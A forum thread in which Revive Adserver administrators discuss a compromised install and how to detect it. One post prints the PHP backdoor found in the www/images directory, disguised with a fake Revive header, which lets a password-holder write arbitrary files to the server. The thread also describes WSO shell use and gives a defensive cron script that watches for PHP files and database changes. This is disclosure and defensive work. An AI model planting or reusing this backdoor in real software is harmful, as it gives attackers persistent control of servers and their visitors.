Backdoor left by hackers after previous 4.x install has been hijacked...

My previous 4.x install got compromised; some of my users were complaining about malware alerts and/or unwanted advertising (it was not all the time nor on all platforms, making the issue difficult to pinpoint).

I thought cleaning the Revive DB and upgrading my Revive install would be enough to secure my site, but sadly no: PREPEND payloads kept being added from time to time despite running the latest version of Revive.

It took some hunting, but I eventually discovered the hacker had left a tiny PHP file in my Revive www/images directory. As I keep that directory during upgrades, the security hole remained.

The file was simple:

----

<?php

/*
+---------------------------------------------------------------------------+
| Revive Adserver                                                           |
| http://www.revive-adserver.com |
|                                                                           |
| Copyright: See the COPYRIGHT.txt file.                                    |
| License: GPLv2 or later, see the LICENSE.txt file.                        |
+---------------------------------------------------------------------------+
*/

// Backdoor as found: the fake Revive header is camouflage. Anyone who knows the
// "password" (a POST value whose MD5 matches the hard-coded hash, redacted here)
// can write arbitrary content to an arbitrary path on the server; the @ hides
// any error from file_put_contents() so failed attempts leave nothing in the log.
if(isset($_POST['adSelect']) && md5($_POST['adSelect']) == '***MD5HASH***') {
    @file_put_contents($_POST['banner_path'], $_POST['banner_contents']);
}

----

This allowed the hacker to load and execute any kind of file/script on my server!!!!

Lately he/she was uploading a "1.php" file (containing, as I found out, a WSO shell) which he/she would connect to in order to load a PREPEND payload into my Revive DB... He would use a different IP to create the 1.php and connect to it (trying to hide their traces). The file would be erased once he/she had done their "job".

The process looks fairly manual.

Of course the hacker may well have left other backdoors outside of my Revive install. This makes it impossible to guarantee all issues are resolved after an upgrade (maybe a quick check for PREPEND payloads and/or PHP files in the www/images directory could offer an alert that something is fishy...).

I would strongly recommend anyone who's had a 4.x install compromised to hunt for such files.

Cheers,

T.

  • 7 months later...
  • 2 months later...

Any word from Revive on this??? Just ignore it and it the issue will go away, right?

Thank you for sharing this. I was just reading about a widespread exploit against Revive, but can't find anything here from them, only from individual users who've had the issue. It seems like Revive should be publishing methods for finding such exploits, since they left the hole in the software that caused this.


On 2/18/2021 at 7:56 PM, miamiman said:

Thank you Thierry... I've had a malware issue that is so sporadic it was hard to prove it was in fact Revive.

I just checked the www/image folder and sure enough there was the culprit.

Have you found any other malicious files since?

Thanks again!

Glad I could help! I did not find any other file. To spy on my hacker I replaced their file with one of my own that would capture their payload and allow me to understand what they were trying to do... The hacker tried to connect a few more times to my server last July, then quit for a while. He made another attempt last January; I haven't heard back since.

As I sadly cannot assume there isn't another backdoor left somewhere... I set a cron job to check the PREPEND fields every 5 minutes and alert me if something goes wrong (that's probably their favorite way of delivering payloads to your visitors).

Cheers,

T. 
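A concrete form of the cron check T. describes above, written as an added example for this thread (it is not T.'s script and not part of Revive Adserver). It assumes the install's www/images path, a MySQL client credentials file, the default rv_ table prefix, and that the injected HTML lives in the prepend/append columns of the banners and zones tables; all of these are assumptions to adjust to your setup. Rather than alerting on any non-empty PREPEND field (some installs use it legitimately), it records a baseline on the first run and alerts only when the set of prepend/append values changes, and it also lists any PHP-family file under the media directory.

```shell
#!/bin/sh
# Added example (not from the thread or from Revive Adserver): a cron-driven
# integrity check for a Revive install. Assumptions:
#   1. REVIVE_IMAGES is the install's www/images directory, which should hold
#      media only, so any server-side script found there is suspicious.
#   2. The injected HTML is stored in the `prepend`/`append` columns of the
#      banners and zones tables, with the default `rv_` prefix (assumed; adjust
#      TABLE_PREFIX to your schema).
# Cron mails any output to MAILTO, so the check prints only when something is off.
set -u

REVIVE_IMAGES="${REVIVE_IMAGES:-/var/www/revive/www/images}"   # assumed path
DB_NAME="${DB_NAME:-revive}"                                    # assumed name
TABLE_PREFIX="${TABLE_PREFIX:-rv_}"
MYSQL_CNF="${MYSQL_CNF:-/etc/revive-check.cnf}"   # [client] user/password, mode 0600
BASELINE="${BASELINE:-/var/lib/revive-check/prepend.baseline}"

# scan_for_scripts DIR: list PHP-family files under DIR, case-insensitively.
scan_for_scripts() {
    find "$1" -type f \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.phar' \
        -o -iname '*.php[3-7]' \) 2>/dev/null | sort
}

# dump_prepend_fields OUTFILE: write every banner/zone row that carries
# prepend/append HTML as "kind<TAB>id<TAB>md5(prepend)<TAB>md5(append)".
dump_prepend_fields() {
    mysql --defaults-extra-file="$MYSQL_CNF" --batch --skip-column-names "$DB_NAME" -e "
        SELECT 'banner', bannerid, MD5(prepend), MD5(append)
          FROM ${TABLE_PREFIX}banners WHERE prepend <> '' OR append <> ''
        UNION ALL
        SELECT 'zone', zoneid, MD5(prepend), MD5(append)
          FROM ${TABLE_PREFIX}zones WHERE prepend <> '' OR append <> '';" > "$1"
}

# compare_snapshot CURRENT BASELINE: returns 0 when CURRENT matches BASELINE
# (creating BASELINE on the first run); otherwise prints the diff and returns 1.
# Legitimate prepend/append HTML may exist; only a change triggers an alert.
compare_snapshot() {
    if [ ! -f "$2" ]; then
        cp "$1" "$2" && echo "baseline recorded in $2"
        return 0
    fi
    cmp -s "$1" "$2" && return 0
    echo "prepend/append fields changed since baseline:"
    diff "$2" "$1"
    return 1
}

# run_check: the cron entry point. Exit status 1 means "look at this now".
run_check() {
    status=0
    hits=$(scan_for_scripts "$REVIVE_IMAGES")
    if [ -n "$hits" ]; then
        echo "script files found under $REVIVE_IMAGES (media directory):"
        echo "$hits"
        status=1
    fi
    tmp=$(mktemp) || return 1
    dump_prepend_fields "$tmp" || { rm -f "$tmp"; echo "database query failed"; return 1; }
    compare_snapshot "$tmp" "$BASELINE" || status=1
    rm -f "$tmp"
    return $status
}

# Example crontab line (assumed paths), every 5 minutes as in the post above:
#   */5 * * * * REVIVE_CHECK_RUN=1 /usr/local/bin/revive-check.sh
if [ "${REVIVE_CHECK_RUN:-0}" = 1 ]; then
    run_check
fi
```

The baseline file must be writable by the cron user only, and after any legitimate edit to a banner's or zone's prepend/append HTML the baseline has to be refreshed by deleting it, otherwise the next run keeps alerting. Hashing the fields instead of dumping them keeps the mail short; once alerted, inspect the row in the Revive admin UI or the database directly.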


On 4/20/2021 at 7:51 PM, scott001 said:

Any word from Revive on this??? Just ignore it and it the issue will go away, right?

Thank you for sharing this. I was just reading about a widespread exploit against Revive, but can't find anything here from them, only from individual users who've had the issue. It seems like Revive should be publishing methods for finding such exploits, since they left the hole in the software that caused this.

Tricky issue!

During any upgrade they could (should?) check that particular folder for PHP files (none should be there...) and alert users that the server was compromised.

The course of action afterwards is beyond their hands, depending on what the hackers did. There is also no guarantee that they would catch all compromised servers -- the hackers would certainly rush to add more backdoors to the servers they have access to...

Having a false sense of security is worse than knowing you are exposed.

T.


Or you can just ignore this and nearly every other post in your forum...it seems like nothing ever gets a reply here.

I'm not sure who's running the show, but it seems like most issues posted here go unanswered. Why bother having a forum at all?

Just ignore it, and it will go away, right?


  • 5 weeks later...

I'm late to this party, but I typically don't upgrade Revive over my current install. I download the latest version to a new directory. There is an article that is similar to my process:

https://www.revive-adserver.com/how-to/update/

It has some steps that I don't use, like making anything world-writeable via chmod 777, but it's still a good guide to study/adopt. The only two files I copy over from my previous install are my config and a custom htaccess file that I drop into the admin directory. I don't use an FTP program; I do the majority of the steps at the command line, the rest in a browser. Plugins are updated from the previous install.

When the upgrade is done I delete the previous version that I just upgraded from. The end result is a virtually clean install of the latest version. I re-apply a single line of code back on my actual website and all of the ads are active again.


On 6/5/2021 at 3:34 PM, motowebmaster said:

I'm late to this party, but I typically don't upgrade Revive over my current install. I download the latest version to a new directory. There is an article that is similar to my process:

https://www.revive-adserver.com/how-to/update/

It has some steps that I don't use, like making anything world-writeable via chmod 777, but it's still a good guide to study/adopt. The only two files I copy over from my previous install are my config and a custom htaccess file that I drop into the admin directory. I don't use an FTP program; I do the majority of the steps at the command line, the rest in a browser. Plugins are updated from the previous install.

When the upgrade is done I delete the previous version that I just upgraded from. The end result is a virtually clean install of the latest version. I re-apply a single line of code back on my actual website and all of the ads are active again.


The backdoor was placed in the directory containing the ad media, which typically gets carried over even after a fresh install... If you don't upload media directly to your server, then your approach is indeed sound.

T.
